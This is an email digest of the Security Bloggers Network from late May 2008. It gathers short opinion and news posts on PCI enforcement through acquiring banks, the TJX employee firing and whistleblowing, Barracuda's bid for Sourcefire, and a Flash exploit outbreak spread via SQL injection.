Spliced feed for Security Bloggers Network |
Separation of duties is a tool, not a goal [Kees Leune] Posted: 31 May 2008 09:27 PM CDT Separation of duty is one of the most powerful tools an information security professional has. But that is exactly what it is: a tool; not a goal. My family and I live in a very safe suburban neighborhood. The incorporated village has its own police force, and most of the village's budget is spent on it. Much to my surprise, we have been becoming more and more aware of suspicious activities in a house in our area; cars pull up at the strangest hours and leave again within 5 minutes. Usually someone walks over from the car to the house, a handshake is exchanged and the visiting party leaves. Sounds like there is some trade in "stuff" going on. As with most people, we are not too happy that this is happening on our doorstep. We have repeatedly called the local police department and even had house visits by detectives who were trying to figure out, from our witness statements, what might be going on. The last house visit ended with the detectives reassuring us to call whenever. Much to our chagrin, whenever we have been calling we cannot get past a dispatcher who knows nothing about the case and refuses to forward our calls to the detectives. Today was a new record; as we witnessed another exchange, we called the police department. The response? "Sorry, the detectives do not work on Saturday. Please call back Monday after 9am to file your report." Excuse me?! It gets "funnier". This time, the car that pulled up was model streetracer; lots of engine revs and loud music. Our next-door neighboors also called dispatch to complain about the loud noises. Guess what? Within 5 minutes; three marked police cars show up on the scene to check out what was going on! I understand that detectives do investigations; just like in information technology, it is the information security officer who does the investigation and the field support techs who do take the general calls. But please; separation of duty is a tool, not a goal. When the dispatcher choses to send three squad cars to a noise complaint, but none to an alleged drug deal, something is wrong in this world. |
Satellite Hacker Tells All [Liquidmatrix Security Digest] Posted: 31 May 2008 12:45 PM CDT From Wired…
Tip of the hat to Adam for this one Tags: satellite hacking |
Posted: 31 May 2008 08:47 AM CDT Solid “B” work here guys and not trying to make you feel bad about you…but, making the “could have done better” face in your direction:
Read why Chinese hackers can’t break that remaining 12%… |
Look to the acquiring banks, not the PCI Security Council [Network Security Blog] Posted: 31 May 2008 02:12 AM CDT Alan is continuing the conversation about the firing at TJX and reporting Payment Card Industries ‘violations’ to someone. I want to pause the conversation for a moment to clear up a few misconceptions. The PCI Security Council has no power to fine and is only responsible maintaining the PCI Data Security Standards and administrating the assessment process. They set the standards and keep track of who’s compliant (or not). That’s about it. They have a lot of power to influence the security industry. They have complete control over the assessment process. But what the PCI Security Standards Council does not have is a direct means to fine a company for not being compliant. There is almost no direct relationship between the PCI Council and the businesses taking credit cards. The credit card companies never fines a merchant directly, since their relationship is with the acquiring bank, not the merchant. In simplest terms, acquiring bank takes the credit card information from the merchant and gives the merchant his money, minus a small fee. The acquiring bank, the PCI Council and the credit card companies all have direct relationships. Only the acquiring bank has a relationship with the merchant. The credit card companies can fine an acquiring bank, but don’t fine a merchant directly. Though that cost is usually passed through to the merchant in some form. If a merchant suffers a compromise or is non-compliant, the acquiring has several punitive options, including raising the per transaction fee or levying a fine. Most merchant would rather receive a fine than raised fees; for medium and large businesses the fine would be much less painful than a .25% raise in their per transaction fees. .25% of several hundred million dollars is still a lot of money. The acquiring bank can also choose to absorb the loss. The acquiring bank has the power to make a company hurt if they’re not compliant or suffer a compromise, the ‘teeth’ Alan’s looking for. There isn’t much direct evidence of how much the acquiring banks are fining companies and what we saw happen with the first TJX incident wasn’t inspiring. Visa fined the acquiring bank $880,000 which will likely be passed along in one form or another. But we, the public, don’t know the specifics of what TJX was fined because there is no reporting requirement. Even working in the industry, all I know of the fines is from the press. The bottom line is, the PCI process has teeth. They’re being used quietly by the acquiring bank as part of the business processes. It’s a monetary issue from start to finish, there are no legal requirements. Would I like to know what the fines being levied against companies are? Yes, and I’d like to have enough information to understand the effectiveness of the PCI Standards. But there’s no fiscal incentive for any of the parties involved to disclose fine information to the public, so don’t expect to see it any time soon. Just because we don’t see the teeth doesn’t mean they’re not their though. And as far as I can tell, there’s no way for the public to get in touch directly with the acquiring banks. |
Leave Sourcefire Alone! [NP-Incomplete] Posted: 31 May 2008 01:54 AM CDT Apparently Barracuda, the SpamAssassin + ClamAV in a box company and perennial purchasers of godforsaken airport advertising space, is trying to eat SourceFire, the people who own ClamAV. I am debating making a Leave-Britney-Alone style video as a response. Trust me, no one wants to see that.* * In interest of full disclosure, I do hold FIRE in my portfolio. |
Bad marketing department! Bad! No bagel day! [NP-Incomplete] Posted: 31 May 2008 01:38 AM CDT Hoff had a post about a VirtSec startup known as Hyperbole. Their product/feature names include such gems as HyperTension, HyperSensitivity, and HyperVentilated. ... All I can think is of some CSO three years from now muttering "I bought HyperTension and all I got was hypertension." |
Links for 2008-05-30 [del.icio.us] [Anton Chuvakin Blog - "Security Warrior"] Posted: 31 May 2008 12:00 AM CDT |
physical access pwns you again...China +1 [Carnal0wnage Blog] Posted: 30 May 2008 07:33 PM CDT unconfirmed but completely believable: "Government officials are not confirming a report that Chinese officials may have secretly copied the contents of a government laptop computer during a December visit to China by Commerce Secretary Carlos Gutierrez. Commerce Secretary Carlos Gutierrez's visit to China has raised security questions. The Associated Press said an investigation into the suspected incident also involved whether China used the information to try to hack into Commerce computers. The AP cited officials and industry experts as sources for the story, which said the surreptitious copying is believed to have occurred when a laptop belonging to someone in the U.S. trade delegation was left unattended. When asked whether the Commerce Department is looking into the matter, spokesman Richard Mills said, "We take security seriously, and as we learn of concerns about security, we look into them." This kind of stuff has been going on for years to businessmen, and who's to blame them if some jackass leaves a laptop unattended. http://www.thedarkvisitor.com/2008/05/lose-a-laptopget-hacked-sigh/ http://www.nationaljournal.com/njmagazine/cs_20080531_6948.php |
Barracuda buying Sourcefire? When Hell(FIRE) freezes over! [Security Incite Rants] Posted: 30 May 2008 11:08 AM CDT Yesterday the folks from Barracuda announced an unsolicited takeover attempt of Sourcefire. They are proposing a 13% premium and think they can "fix" some of the execution problems that have plauged FIRE since they went public. I'm sure the fish aren't laughing, but everyone else in the industry is. This deal isn't going to happen, not in it's current form anyway. Here are a couple of points that create serious headwind for the deal:
So Sourcefire was correct in rejecting the deal and not even sitting down. If Barracuda was serious, they would have proposed a much higher premium and had a more effectively communicated strategy for the combined entity. The could have taken a page from Microsoft (62% permium for Yahoo) and IBM (huge premium for Lotus back in the day) and proposed a number that would be hard to walk away from. They didn't. But let's be clear - that's not what this deal was about. This is another example of why Barracuda may be the most effectively marketed security company out there. For the cost of a press release and some legal fees, they are going to be the talk of the town, even if Howie Mandel is just saying "No Deal!" You have to figure that Barracuda is angling for a public offering in the near term (once the markets right themselves) and this is a great way to get some visibility with the investors that are likely to invest in their IPO. A 13% premium is a joke. But as a PR and investor relations strategy, it's brilliant.
|
Event Planner: Gartner IT Security Summit [Liquidmatrix Security Digest] Posted: 30 May 2008 09:53 AM CDT In case there are any readers who might recognize me, you’ll be able to find me at the Gartner IT Security Summit next week (June 2 -3). I’m hoping to learn something quadranty.
Check my Twitter for updates on where I am and what’s good or bad. Tags: conferences, gartner, gartner it security summit, gaylord national resort |
Security Briefing: May 30th [Liquidmatrix Security Digest] Posted: 30 May 2008 09:29 AM CDT What a week - it’s like I’m swimming uphill both ways and it’s snowing. An extra large helping of news to make up for being late this morning. And hey - thanks to all of our new subscribers that joined us yesterday. Welcome! Click here to subscribe to Liquidmatrix Security Digest! And now, the news…
Tags: News, Daily Links, Security Blog, Information Security, Security News |
I didn’t sign nothing (NDA) [Network Security Blog] Posted: 30 May 2008 08:48 AM CDT As Public Relations folks continue to embrace bloggers and treat us more like press, I get more and more press releases and opportunities to talk to the people at security companies. I enjoy getting this information and appreciate talking to these companies as an analyst/press. But I have to laugh sometimes when they pull stupid stunts, like putting the phrase ‘Under NDA’ in the middle of a presentation. If I didn’t sign any paperwork, the only thing obligating me to that Non-Disclosure Agreement is common courtesy, something PR people need to be very careful of expecting as they dip their toes in the blogosphere. Something that PR people, as well as bloggers, are still figuring out is the exact nature of the relationship between the two groups. PR professionals are used to building relationships with reporters and knowing exactly who they’re talking to. With bloggers they don’t have that relationship, they don’t even necessarily know the name of the person they’re dealing with. On the flip side, most bloggers have no idea how to react to invitations and press releases from PR agencies. The reactions can range from completely ignoring PR to maliciously using the information provided. I suspect most of us lean towards the ‘ignore them and they’ll go away’ camp. I used to ignore most press releases, but I started changing that recently. Blogging is about communication and learning, both of which are the exact thing PR people are trying to provide. I’ve started responding to some press releases, letting the PR folks know if I find their press releases relevant or not. I’m trying to build some of the same relationships ‘real’ reporters have and making PR aware of my interests is part of that. But the relationship has to go both ways; PR folks need to communicate little things like the expectation of not releasing product information prior to the products release date. In this case, it’s not a big deal: the product will be out next Monday. But when I saw the NDA statement cleverly slipped into the presentation, part of me wanted to post about it right away just out of spite. Luckily the larger, more responsible part of me decided it’d be a poor treatment of the company. Bloggers and PR folks have a lot of learning to do about one another. We have to understand that PR professionals have access to a lot of valuable information we might not be able to get elsewhere. PR professionals need to realize that bloggers are not reporters, we don’t have the background a reporter does and in many cases a quick flash of popularity and traffic is more important to us than a ‘relationship’ with a PR firm. If you want something to be under Non-Disclosure Agreement, ask up front if a blogger is willing to respect a verbal NDA. But don’t slip it into a slide in your presentation and expect it to be honored. |
Who you gonna run to? [Network Security Blog] Posted: 30 May 2008 12:59 AM CDT Alan Shimel faults me for saying sometimes you just have to walk away, in reference to TJX firing Cryptic_Mauler (the upper/lower case stuff is too much for me to type again and again). Alan talks about illegal behavior, turning your employer in to the authorities, standing up for your morals to do what’s right. Of course, he ignores the fact that nothing TJX is being accused of is illegal; stupid, yes, but not illegal. And the fact is there’s no one to turn TJX in to, not in the government and certainly not at the PCI Security Council or the major credit card companies. Cryptic_Mauler was in an untenable situation: his employer was practicing the worst sort of security, they didn’t want to change, there’s no one he could report them to. Alan wishes there were someone CM could have reported TJX’s woefully inadequate security practices to, but if such a entity exists, I’ve never heard of one. The best thing he could have done was report the problem to TJX’s acquiring bank, but unless you’re really into credit card processing, the chances are you’ve never even heard of an acquiring bank let alone have any idea of who to call. I like Alan, but asking me why I didn’t list reporting TJX to the authorities as an option is like asking me when was the last time I spoke to the Easter Bunny! Neither one exists! (my kids don’t read this, so I can say that). It’s fine to talk about taking the high moral ground when you’re living in a fantasy world, but the reality I live in doesn’t have anyone Cryptic_Mauler could have gone to to report TJX. I really wish it did, I could have used them myself in the past. And why doesn’t the PCI Security Council have some way of reporting offending companies? I’ll hazard a guess and say they’ve probably talked about establishing just such a capability and decided against it in the strongest possible way. After all, if they had a way for someone to report violations to, that’d make the Council responsible for acting on those reports. And that’s something they really, really don’t want. But that’s only a guess. |
Lose a laptop…get hacked? Sigh… [The Dark Visitor] Posted: 29 May 2008 10:33 PM CDT Not sure if this even qualifies as a post but, whatevah:
|
Then it all went black…Chinese hackers shutting out the lights? [The Dark Visitor] Posted: 29 May 2008 10:24 PM CDT I have no words…
|
Keynote Speakers for The Last Hope Announced [Liquidmatrix Security Digest] Posted: 29 May 2008 08:46 PM CDT Just a heads up — Liquidmatrix Security Digest will be at The Last Hope. There may even be some shwag available.
… and since I’m temporarily in charge — shwag is only available to those who recognize me. |
Security Brieflet (the late edition): May 29th [Liquidmatrix Security Digest] Posted: 29 May 2008 06:57 PM CDT A couple of interesting stories over the course of the day… Comcast Defaced (for a short while) I can’t say that I’m all that saddened… it is Comcast after all. Banks don’t disclose all breaches I’d love to argue this one, but I’ve known too many bankers. Back with more Liquidmatrix Love in the morning folks, the night is young and I’ve got work-related documentation to produce. Tags: information security news, opinion |
Disclosing in a public forum is not whistle blowing [Network Security Blog] Posted: 29 May 2008 04:02 PM CDT Last week TJX fired one of their employees for disclosing on ha.ckers.org that TJX is using blank passwords and other very insecure procedures. Posting in what he thought was an anonymous manner, CrYpTiC_MauleR was tracked down by management at TJX through his ISP, asked what he felt is wrong with the TJX network and fired. And as bad as I feel for him personally, I think TJX did the right thing. Don’t get me wrong, I have very little sympathy for a company like TJX. They had one of the biggest credit card breaches in history, they’ve been put through the ringer and they still have the temerity to allow such bad practices as blank passwords and running servers as admin. I’m hoping TJX’s acquiring bank, PCI assessor and Visa/Mastercard get wind of these issues and call them on the carpet for it. But I don’t excuse the actions of Cryptic_Mauler. I’ve read most of the thread on sla.cers.org, and this appears to be an issue of venting frustration, not whistle blowing. If Cryptic_Mauler was talking to federal investigators or maybe even a reporter, I might call it whistle blowing, but by disclosing it in a security forum, it was simply a way of pointing the finger at the stupidity of his employer. It’s not a case of full disclosure either, since that usually refers to We’ve all been in situations where we have employers doing stupid things. We do our best to communicate with management about the problems and hope they react appropriately. The problem is, our perception of ‘appropriately’ and management’s is often very different. What we see as a horrible security hole, they may see as another minor problem that would take major money to fix. Or just as something that they don’t want to think about right now. There’s no reporting mechanism built into the Payment Card Industry standards. To the best of my knowledge, there’s no clear cut method to report a company that has bad practices to the credit card companies or the government at all. There’s not even a press person you can talk to about the issues with to bring it to public awareness. It’s frustrating because, despite their known issues, TJX is probably far from the worst offender and there needs to be a way to make these people sit up and take notice. But that’s no excuse for posting the issues with the TJX network in a public forum. Cryptic_Mauler isn’t a security professional. He wasn’t even a part of the IT team. But he was an employee of the company and as such was held to certain expectations. Keeping internal company issues internal is one of those expectations. I don’t like how TJX is apparently handling their problems, I don’t like that they aren’t responding more positively to internal criticism, but I don’t see that they could have taken any other action in this circumstance. I’ve had to resign from a job before because the company wasn’t being responsible in my opinion. I’ve seen companies in the past that shouldn’t be allowed to have computers let alone an ecommerce site. I’ve been at companies that I wondered how they stayed in business, not even considering their security concerns. But I always tried to react ethically and within the bounds of my moral obligations. I’ve learned that I can do what I can do and sometimes I have to walk away and let someone else deal with the problem. Public disclosure doesn’t fit in my world view of ethics and morality. It’s frustrating dealing with a company that doesn’t want to change. It’s hard not having leverage to make the changes that you see need to be made. How you react to that frustration is up to you. Do you scream in public like Cryptic_Mauler, keep going until you find someone who can make the change or do you move on to another opportunity? I hope Cryptic_Mauler can find a new position somewhere else; I hope the limited notoriety this incident gives him will help him further his career. But I think he made a mistake in publicly disclosing TJX’s problems, one I hope doesn’t continue to haunt him. |
As if you needed more reasons to use NoScript: Flash [Network Security Blog] Posted: 29 May 2008 09:50 AM CDT I’ve made no secret of the fact that I’m a big fan of Firefox and the NoScript plugin. I don’t want anything running in my browser that I don’t explicitly approve of. And now with the big rise in sites compromised with the latest Flash exploits, there are more reasons than ever to use NoScript. I don’t use Flashblock myself, but it also comes highly recommended for dealing with this issue. The interesting thing to me is that this attack is a combination of SQL injection against the servers and a payload containing the Flash exploit. If the compromised sites had made the effort to use good coding practices and checked for SQL injections, this wouldn’t be a big deal. Another alternative would have been a web application firewall. This is 2008, not 1998, SQL injection is low hanging fruit on the security tree and most of the sites compromised should have something in place to stop SQL injections. But they don’t, so we have a nice outbreak of Flash exploits. Security Focus stated that there were approximately 20,000 compromised web pages as of Tuesday. That sounds like a lot until you figure out the math and realize that this may mean 2000 or less machines compromised, depending on the average number of pages per system. I guess 2000 doesn’t get the clicks nearly as well as 20,000 does. |
Security Briefing: May 29th [Liquidmatrix Security Digest] Posted: 29 May 2008 09:19 AM CDT Wheeeeee… I’d like to take this moment to again bitch and moan about how much work this is — I don’t know how Dave finds the time and I’m not a morning person and I feel really bad and I’ve been busy and I don’t have enough coffee and… yeah. I got nothin. Have a Rockin’ Thursday! Thanks to all of our new subscribers that joined us yesterday. Welcome! Click here to subscribe to Liquidmatrix Security Digest! And now, the news…
Tags: News, Daily Links, Security Blog, Information Security, Security News |
You are subscribed to email updates from Security Bloggers Network To stop receiving these emails, you may unsubscribe now. | Email Delivery powered by FeedBurner |
Inbox too full? Subscribe to the feed version of Security Bloggers Network in a feed reader. | |
If you prefer to unsubscribe via postal mail, write to: Security Bloggers Network, c/o FeedBurner, 20 W Kinzie, 9th Floor, Chicago IL USA 60610 |
No comments:
Post a Comment